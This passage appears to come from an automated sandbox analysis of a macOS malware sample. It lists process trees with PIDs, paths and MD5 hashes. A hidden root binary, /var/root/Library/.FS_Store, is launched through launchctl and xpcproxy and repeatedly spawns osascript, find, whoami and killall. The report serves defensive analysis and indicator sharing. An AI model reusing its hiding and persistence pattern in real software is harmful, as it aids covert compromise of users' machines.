MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 690 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 691 Parent PID: 690

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 692 Parent PID: 691

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 694 Parent PID: 692

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 694 Parent PID: 692

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 695 Parent PID: 691

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 696 Parent PID: 695

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 696 Parent PID: 695

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 693 Parent PID: 690

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 693 Parent PID: 690

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 697 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: mv PID: 697 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

Chronological Activities

Analysis Process: sh PID: 698 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: touch PID: 698 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

Chronological Activities

Analysis Process: sh PID: 699 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: touch PID: 699 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

Chronological Activities

Analysis Process: sh PID: 700 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: launchctl PID: 700 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/launchctl
File size:124048 bytes
MD5 hash:5c763753d802b9b6b8225d829e7a7fc9

Chronological Activities

Analysis Process: sh PID: 701 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: launchctl PID: 701 Parent PID: 686

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/launchctl
File size:124048 bytes
MD5 hash:5c763753d802b9b6b8225d829e7a7fc9

Chronological Activities

Analysis Process: xpcproxy PID: 702 Parent PID: 1

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/libexec/xpcproxy
File size:42656 bytes
MD5 hash:b2faf9621ba8f5b2bcea6ee7d572a8b7

Chronological Activities

Analysis Process: bash PID: 702 Parent PID: 1

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/bash
File size:-1 bytes
MD5 hash:

Chronological Activities

Analysis Process: bash PID: 702 Parent PID: 1

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/bash
File size:628496 bytes
MD5 hash:5d7583d80e5314ac844eedc6d68c6cd7

Chronological Activities

Analysis Process: bash PID: 703 Parent PID: 702

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/bash
File size:628496 bytes
MD5 hash:5d7583d80e5314ac844eedc6d68c6cd7

Chronological Activities

Analysis Process: pgrep PID: 703 Parent PID: 702

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/pgrep
File size:30032 bytes
MD5 hash:1d6274484312b8d37153962fa6ba6c19

Chronological Activities

Analysis Process: bash PID: 704 Parent PID: 702

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/bash
File size:628496 bytes
MD5 hash:5d7583d80e5314ac844eedc6d68c6cd7

Chronological Activities

Analysis Process: .FS_Store PID: 704 Parent PID: 702

General

Start time:18:07:04
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 705 Parent PID: 704

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 706 Parent PID: 705

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 706 Parent PID: 705

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 707 Parent PID: 705

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 707 Parent PID: 705

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 708 Parent PID: 704

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 709 Parent PID: 708

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 710 Parent PID: 709

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 712 Parent PID: 710

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 712 Parent PID: 710

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 713 Parent PID: 709

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 714 Parent PID: 713

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 714 Parent PID: 713

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 711 Parent PID: 708

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 711 Parent PID: 708

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 715 Parent PID: 704

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: find PID: 715 Parent PID: 704

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/find
File size:51584 bytes
MD5 hash:64fb7128066436f7954ecd6eaf22b2ad

Chronological Activities

Analysis Process: sh PID: 716 Parent PID: 715

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 717 Parent PID: 716

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: whoami PID: 717 Parent PID: 716

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/whoami
File size:23136 bytes
MD5 hash:430282bb4bfe4a1368a9effa4fe6733f

Chronological Activities

Analysis Process: find PID: 718 Parent PID: 715

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/find
File size:51584 bytes
MD5 hash:64fb7128066436f7954ecd6eaf22b2ad

Chronological Activities

Analysis Process: .FS_Store PID: 718 Parent PID: 715

General

Start time:18:07:04
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 719 Parent PID: 718

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 720 Parent PID: 719

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 720 Parent PID: 719

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 721 Parent PID: 719

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 721 Parent PID: 719

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 722 Parent PID: 718

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 723 Parent PID: 722

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 724 Parent PID: 723

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 726 Parent PID: 724

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 726 Parent PID: 724

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 727 Parent PID: 723

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 728 Parent PID: 727

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sysctl PID: 728 Parent PID: 727

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/sbin/sysctl
File size:60608 bytes
MD5 hash:6b5514b612e9e7ea63857c6fdcab2c5b

Chronological Activities

Analysis Process: sh PID: 725 Parent PID: 722

General

Start time:18:07:04
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: grep PID: 725 Parent PID: 722

General

Start time:18:07:04
Start date:16/06/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

Chronological Activities

Analysis Process: sh PID: 730 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: touch PID: 730 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

Chronological Activities

Analysis Process: sh PID: 731 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: touch PID: 731 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

Chronological Activities

Analysis Process: sh PID: 732 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: killall PID: 732 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

Chronological Activities

Analysis Process: .FS_Store PID: 734 Parent PID: 704

General

Start time:18:07:05
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 735 Parent PID: 734

General

Start time:18:07:05
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 736 Parent PID: 734

General

Start time:18:07:05
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 736 Parent PID: 734

General

Start time:18:07:05
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 738 Parent PID: 704

General

Start time:18:07:06
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 739 Parent PID: 738

General

Start time:18:07:06
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 740 Parent PID: 738

General

Start time:18:07:06
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 740 Parent PID: 738

General

Start time:18:07:06
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 741 Parent PID: 704

General

Start time:18:07:07
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 742 Parent PID: 741

General

Start time:18:07:07
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 743 Parent PID: 741

General

Start time:18:07:07
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 743 Parent PID: 741

General

Start time:18:07:07
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 745 Parent PID: 704

General

Start time:18:07:08
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 746 Parent PID: 745

General

Start time:18:07:08
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 747 Parent PID: 745

General

Start time:18:07:08
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 747 Parent PID: 745

General

Start time:18:07:08
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 748 Parent PID: 704

General

Start time:18:07:09
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 749 Parent PID: 748

General

Start time:18:07:09
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 750 Parent PID: 748

General

Start time:18:07:09
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 750 Parent PID: 748

General

Start time:18:07:09
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 751 Parent PID: 704

General

Start time:18:07:10
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 752 Parent PID: 751

General

Start time:18:07:10
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 753 Parent PID: 751

General

Start time:18:07:10
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 753 Parent PID: 751

General

Start time:18:07:10
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 754 Parent PID: 704

General

Start time:18:07:11
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 755 Parent PID: 754

General

Start time:18:07:11
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 756 Parent PID: 754

General

Start time:18:07:11
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 756 Parent PID: 754

General

Start time:18:07:11
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 757 Parent PID: 704

General

Start time:18:07:12
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 758 Parent PID: 757

General

Start time:18:07:12
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 759 Parent PID: 757

General

Start time:18:07:13
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 759 Parent PID: 757

General

Start time:18:07:13
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 760 Parent PID: 704

General

Start time:18:07:13
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 761 Parent PID: 760

General

Start time:18:07:14
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 762 Parent PID: 760

General

Start time:18:07:14
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 762 Parent PID: 760

General

Start time:18:07:14
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 763 Parent PID: 704

General

Start time:18:07:15
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 764 Parent PID: 763

General

Start time:18:07:15
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 765 Parent PID: 763

General

Start time:18:07:15
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 765 Parent PID: 763

General

Start time:18:07:15
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 766 Parent PID: 704

General

Start time:18:07:16
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 767 Parent PID: 766

General

Start time:18:07:16
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 768 Parent PID: 766

General

Start time:18:07:16
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 768 Parent PID: 766

General

Start time:18:07:16
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 769 Parent PID: 704

General

Start time:18:07:17
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 770 Parent PID: 769

General

Start time:18:07:17
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 771 Parent PID: 769

General

Start time:18:07:17
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 771 Parent PID: 769

General

Start time:18:07:17
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 772 Parent PID: 704

General

Start time:18:07:18
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 773 Parent PID: 772

General

Start time:18:07:18
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 774 Parent PID: 772

General

Start time:18:07:18
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 774 Parent PID: 772

General

Start time:18:07:18
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 775 Parent PID: 704

General

Start time:18:07:19
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 776 Parent PID: 775

General

Start time:18:07:19
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 777 Parent PID: 775

General

Start time:18:07:19
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 777 Parent PID: 775

General

Start time:18:07:19
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 778 Parent PID: 704

General

Start time:18:07:20
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 779 Parent PID: 778

General

Start time:18:07:20
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 780 Parent PID: 778

General

Start time:18:07:20
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 780 Parent PID: 778

General

Start time:18:07:20
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 782 Parent PID: 704

General

Start time:18:07:21
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 783 Parent PID: 782

General

Start time:18:07:21
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 784 Parent PID: 782

General

Start time:18:07:21
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 784 Parent PID: 782

General

Start time:18:07:21
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 785 Parent PID: 704

General

Start time:18:07:22
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 786 Parent PID: 785

General

Start time:18:07:22
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 787 Parent PID: 785

General

Start time:18:07:22
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 787 Parent PID: 785

General

Start time:18:07:22
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 788 Parent PID: 704

General

Start time:18:07:23
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 789 Parent PID: 788

General

Start time:18:07:23
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

